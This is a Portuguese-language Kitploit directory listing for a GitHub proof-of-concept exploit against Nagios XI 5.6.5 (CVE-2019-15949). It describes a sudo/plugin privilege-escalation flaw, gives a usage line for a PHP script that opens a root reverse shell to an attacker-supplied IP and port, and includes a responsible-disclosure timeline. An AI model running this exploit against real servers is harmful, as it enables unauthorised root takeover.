Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
nagiosxi-root-rce-exploit — POC que explora uma vulnerabilidade no Nagios XI (5.6.5) para gerar um shell root. | Kitploit
Ferramentas/GitHubGitHub/jakgibb/nagiosxi-root-rce-exploit
Escalada de PrivilégiosExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubjakgibb/nagiosxi-root-rce-exploit

nagiosxi-root-rce-exploit

POC que explora uma vulnerabilidade no Nagios XI (5.6.5) para gerar um shell root.

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
167há 5 anosAinda não revisado

nagiosxi-root-exploit

Visão Geral

Existe uma vulnerabilidade no Nagios XI <= 5.6.5 que permite a um atacante aproveitar um RCE para escalar privilégios para root.
O exploit requer acesso ao servidor como o usuário 'nagios', ou acesso CCM via interface web com permissões para gerenciar plugins.

Detalhes

O script getprofile.sh, invocado ao baixar um perfil do sistema (profile.php?cmd=download), é executado como root através de uma entrada sudo sem senha; o script executa o executável ‘check_plugin’ que pertence ao usuário nagios. Um usuário conectado ao Nagios XI com permissões para modificar plugins, ou o usuário 'nagios' no servidor, pode modificar o executável ‘check_plugin’ e inserir comandos maliciosos executáveis como root.

POC

Um POC em PHP foi desenvolvido e envia um payload que resulta em um shell reverso de root.
Uso:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port

Divulgação

Relatado à Nagios em: 29 de julho de 2019
Confirmado pela Nagios em: 29 de julho de 2019
Corrigido na versão: 5.6.6 em: 20 de agosto de 2019
CVE atribuída em: 6 de setembro de 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)

alt text

Baixar ferramenta